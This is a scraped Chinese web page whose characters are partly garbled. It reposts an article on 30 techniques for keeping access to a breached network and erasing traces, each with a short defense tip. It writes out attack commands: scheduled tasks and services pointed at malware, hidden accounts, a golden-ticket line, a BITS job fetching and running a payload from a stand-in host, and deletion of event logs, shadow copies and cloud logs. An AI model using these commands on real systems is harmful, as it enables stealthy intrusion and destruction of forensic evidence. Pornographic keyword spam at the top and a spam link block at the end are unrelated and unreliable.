公交车上荫蒂添的好舒服的电影-公用玩物(np双xing总受)-公用小荡货芊芊-公与妇仑乱hd-攻把受做哭边走边肉楼梯play-古装一级淫片a免费播放口

LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

內(nèi)網(wǎng)‘幽靈’滲透實(shí)錄:30個(gè)權(quán)限維持+痕跡清理,你漏了哪招?

admin
2025年4月24日 10:57 本文熱度 219

在攻防對抗中,內(nèi)網(wǎng)橫向移動后的權(quán)限維持與痕跡清理是決定攻擊能否長期隱蔽的關(guān)鍵環(huán)節(jié)。本文將系統(tǒng)解析30種高價(jià)值技巧,覆蓋Windows/Linux系統(tǒng)、域環(huán)境及常見服務(wù),并提供對應(yīng)的防御視角建議。


第一部分:權(quán)限維持15則

  1. 1. 計(jì)劃任務(wù)偽裝
    • 技術(shù)點(diǎn):通過schtasks創(chuàng)建名稱類似系統(tǒng)服務(wù)(如MicrosoftEdgeUpdate)的定時(shí)任務(wù),觸發(fā)后門執(zhí)行。
    • 操作schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:\malware.exe" /sc hourly
    • 防御:監(jiān)控計(jì)劃任務(wù)中非微軟簽名的程序路徑。
  2. 2. 服務(wù)注入
    • 技術(shù)點(diǎn):劫持合法服務(wù)(如Print Spooler)的二進(jìn)制路徑指向惡意負(fù)載。
    • 操作sc config spooler binPath= "C:\Windows\System32\mal.dll"
    • 防御:啟用服務(wù)簽名驗(yàn)證(RequireSignedServiceBinaries)。
  3. 3. 注冊表自啟動項(xiàng)
    • 技術(shù)點(diǎn):修改HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKLM對應(yīng)項(xiàng)。
    • 隱蔽性:使用CLSID混淆鍵名(如{AB3D1234-...})。
    • 防御:部署注冊表變更告警規(guī)則。
  4. 4. 啟動文件夾植入
    • 技術(shù)點(diǎn):將惡意快捷方式(.lnk)放入%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
    • 繞過:利用.url文件偽裝為合法文檔。
    • 防御:限制用戶目錄寫入權(quán)限。
  5. 5. WMI事件訂閱
    • 技術(shù)點(diǎn):注冊WMI事件過濾器(如用戶登錄觸發(fā)后門)。
    • 腳本
      $filterArgs = @{ EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" }  
      $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }  
    • 防御:定期審計(jì)__EventFilter/__EventConsumer類。
  6. 6. 影子賬戶創(chuàng)建
    • 技術(shù)點(diǎn):通過注冊表添加隱藏賬戶(F值修改為0x3e9)。
    • 操作
      reg add "HKLM\SAM\SAM\Domains\Account\Users\000003E9" /v F /t REG_BINARY /d ...  
    • 防御:檢查SAM中用戶RID是否連續(xù)。
  7. 7. 黃金票據(jù)(Golden Ticket)
    • 技術(shù)點(diǎn):利用域控的KRBTGT哈希偽造TGT票據(jù)。
    • 生成
      kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt  
    • 防御:定期重置KRBTGT密碼(每180天)。
  8. 8. ACL后門
    • 技術(shù)點(diǎn):為關(guān)鍵進(jìn)程(如LSASS.exe)添加調(diào)試權(quán)限。
    • 操作
      Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow  
    • 防御:監(jiān)控敏感進(jìn)程的ACL變更。
  9. 9. DLL劫持
    • 技術(shù)點(diǎn):替換系統(tǒng)目錄(如C:\Windows\System32\)中未簽名的DLL。
    • 優(yōu)先級:利用DLL搜索順序劫持應(yīng)用程序。
    • 防御:啟用DLL簽名強(qiáng)制驗(yàn)證(CIG功能)。
  10. 10. RID劫持攻擊
    • 技術(shù)點(diǎn):修改低權(quán)限用戶的RID為500(管理員RID)。
    • 操作:通過mimikatz調(diào)整注冊表F字段。
    • 防御:檢查用戶SID與RID的合法性。
  11. 11. COM劫持
    • 技術(shù)點(diǎn):注冊惡意COM組件劫持MMCOffice調(diào)用鏈。
    • 注冊表路徑HKCR\CLSID\{...}\InprocServer32
    • 防御:禁用未簽名的COM組件加載。
  12. 12. Hook注入(API Hooking)
    • 技術(shù)點(diǎn):注入WS2_32.dllconnect函數(shù)實(shí)現(xiàn)網(wǎng)絡(luò)通信重定向。
    • 工具:使用Detours庫實(shí)現(xiàn)函數(shù)劫持。
    • 防御:啟用驅(qū)動簽名驗(yàn)證(DSE)。
  13. 13. Bits Jobs持久化
    • 技術(shù)點(diǎn):利用后臺智能傳輸服務(wù)(BITS)下載惡意負(fù)載。
    • 命令
      bitsadmin /create backdoor  
      bitsadmin /addfile backdoor http://mal.com/payload.exe C:\temp\svchost.exe  
      bitsadmin /SetNotifyCmdLine backdoor C:\temp\svchost.exe NULL  
    • 防御:審核BITS任務(wù)列表。
  14. 14. 域信任關(guān)系濫用
    • 技術(shù)點(diǎn):在跨域信任場景中利用SID History屬性提權(quán)。
    • 操作:使用mimikatz添加域控的SID至用戶屬性。
    • 防御:禁用不必要的域信任關(guān)系。
  15. 15. Office宏持久化
    • 技術(shù)點(diǎn):在Normal.dotm模板中嵌入惡意宏代碼。
    • 觸發(fā):用戶啟動Word時(shí)自動執(zhí)行。
    • 防御:啟用宏執(zhí)行限制(僅允許簽名宏)。

第二部分:痕跡清理15則

  1. 16. Windows事件日志清除
    • 工具wevtutil cl Security(需管理員權(quán)限)。
    • 對抗:使用內(nèi)存注入技術(shù)直接操作eventlog.service進(jìn)程。
    • 防御:啟用日志轉(zhuǎn)發(fā)至SIEM系統(tǒng)。
  2. 17. IIS日志擦除
    • 路徑C:\inetpub\logs\LogFiles\W3SVC1\。
    • 技巧:僅刪除特定時(shí)間段的日志條目(避免全量刪除引發(fā)懷疑)。
    • 防御:配置日志文件ACL為只讀。
  3. 18. 防火墻規(guī)則恢復(fù)
    • 操作:刪除新增的放行規(guī)則(netsh advfirewall firewall delete rule name="mal_rule")。
    • 隱蔽:復(fù)用已有規(guī)則名稱(如Remote Desktop)。
    • 防御:基線化防火墻規(guī)則并監(jiān)控變更。
  4. 19. 文件時(shí)間戳偽造
    • 工具timestomp.exe -m "01/01/2020 08:00:00" malware.exe
    • 匹配:將時(shí)間戳與系統(tǒng)文件(如notepad.exe)保持一致。
    • 防御:啟用文件完整性監(jiān)控(FIM)。
  5. 20. 內(nèi)存痕跡清除
    • 技術(shù)點(diǎn):卸載惡意驅(qū)動后調(diào)用ExAllocatePool覆蓋內(nèi)存區(qū)域。
    • 工具:使用BOF(Beacon Object Files)實(shí)現(xiàn)無文件擦除。
    • 防御:部署內(nèi)存掃描工具(如Elastic Endpoint)。
  6. 21. 回收站繞過刪除
    • 命令del /f /q /s *.*配合shift+delete徹底清除。
    • 增強(qiáng):使用cipher /w:C:覆寫磁盤空閑空間。
    • 防御:審計(jì)敏感目錄的文件刪除操作。
  7. 22. 預(yù)讀取文件清理
    • 路徑C:\Windows\Prefetch\.pf文件。
    • 操作:定期執(zhí)行del /f /q C:\Windows\Prefetch\*.pf。
    • 防御:禁用預(yù)讀取功能(需評估性能影響)。
  8. 23. 卷影副本刪除
    • 命令vssadmin delete shadows /all /quiet。
    • 對抗:在提權(quán)后優(yōu)先刪除卷影防止取證恢復(fù)。
    • 防御:限制vssadmin執(zhí)行權(quán)限。
  9. 24. RDP連接記錄清除
    • 注冊表路徑HKCU\Software\Microsoft\Terminal Server Client\Servers。
    • 自動化:編寫腳本批量刪除歷史IP記錄。
    • 防御:啟用RDP連接日志審計(jì)。
  10. 25. 瀏覽器歷史痕跡清理
    • 工具:使用BrowsingHistoryView導(dǎo)出并刪除Chrome/Firefox記錄。
    • 進(jìn)階:劫持瀏覽器擴(kuò)展自動清理歷史(如惡意插件)。
    • 防御:監(jiān)控瀏覽器進(jìn)程的異常行為。
  11. 26. PowerShell日志繞過
    • 技術(shù)點(diǎn):通過-WindowStyle Hidden -ExecutionPolicy Bypass隱藏執(zhí)行窗口。
    • 日志清除:刪除Microsoft-Windows-PowerShell%4Operational.evtx。
    • 防御:啟用模塊日志記錄(ScriptBlockLogging)。
  12. 27. WMI日志清理
    • 路徑Applications and Services Logs\Microsoft\Windows\WMI-Activity
    • 難點(diǎn):需停止Winmgmt服務(wù)后操作日志文件。
    • 防御:啟用WMI活動審計(jì)策略。
  13. 28. Linux utmp/wtmp清理
    • 文件/var/run/utmp、/var/log/wtmp
    • 命令:使用utmpdump工具編輯登錄記錄。
    • 防御:配置ttylog實(shí)時(shí)記錄會話內(nèi)容。
  14. 29. 數(shù)據(jù)庫日志截?cái)?/span>
    • MySQLPURGE BINARY LOGS BEFORE '2024-01-01';
    • MSSQL:執(zhí)行EXEC sp_cycle_errorlog;循環(huán)日志文件。
    • 防御:啟用數(shù)據(jù)庫審計(jì)并異地存儲日志。
  15. 30. 云平臺日志覆蓋
    • AWS:通過DeleteLogGroup刪除CloudTrail日志組。
    • Azure:使用Remove-AzLogProfile清除活動日志配置。
    • 防御:啟用云日志不可變性(Immutable Storage)。

防御方建議

  • 權(quán)限維持檢測:部署EDR監(jiān)控進(jìn)程樹異常、注冊表關(guān)鍵路徑變更及服務(wù)簽名異常。
  • 痕跡清理對抗:實(shí)施日志多副本存儲(本地+云端+物理設(shè)備),使用AI分析日志完整性。
  • 紅隊(duì)驗(yàn)證:定期模擬攻擊驗(yàn)證防御體系有效性,重點(diǎn)關(guān)注上述30項(xiàng)技術(shù)的防護(hù)盲區(qū)。


閱讀原文:https://mp.weixin.qq.com/s/KHNbBR3WAjDGaLGvRZoUwQ


該文章在 2025/4/24 10:57:23 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 91麻精品国产91久久久久 | 国产a级黄色毛片 | 国产精品亚洲综合看片 | 成人黄色免费小视频 | 韩国精品一区二区三区无码视频 | 91久久精品免费看国产一区 | 国产精品一级毛片无码 | 国产白袜脚足j棉袜在线观看 | 91一区二区在线播放 | 国产成人欧美日本在线观看 | 91亚洲最新精品 | 国产午夜精品美女视频 | 国产波霸爆乳一区二区黄色 | 国产午夜无码福利在线看网站 | 精品视频一区二区 | 国产欧美日韩综合在线 | 国产超碰人人做人人 | 国产成人无码午夜视频在线播放 | 国产日韩精品视频一区二区 | 国产午夜精品久久久久免费视 | 国产女同无遮挡互慰高潮视频 | 国产v亚洲v天堂无码久久 | 国产v片在线播放免费无码 国产v片在线播放免费无遮挡 | 国产精品国产三级国产专区 | 国产女同无遮挡互慰高潮视频 | 国产无套视频在线观看香蕉 | 成人国产在线观看高清不 | 国产午夜激无码av片在线观看 | 成人播放日韩在线播放视频视频 | 精品国产国语对白久久免费 | 国产精品丝袜久久久久久不卡 | 国产精品v毛片免费软件 | 国产午夜片无 | 国产综合久久久 | 成人国产在线不卡视频 | a人片视频在线观看 | 国产成人精品在线 | 国产av无码专区亚洲精品网站 | 国产精品免费无 | 国产福利视频在线观看福利 | 国产精品爽爽v在线 |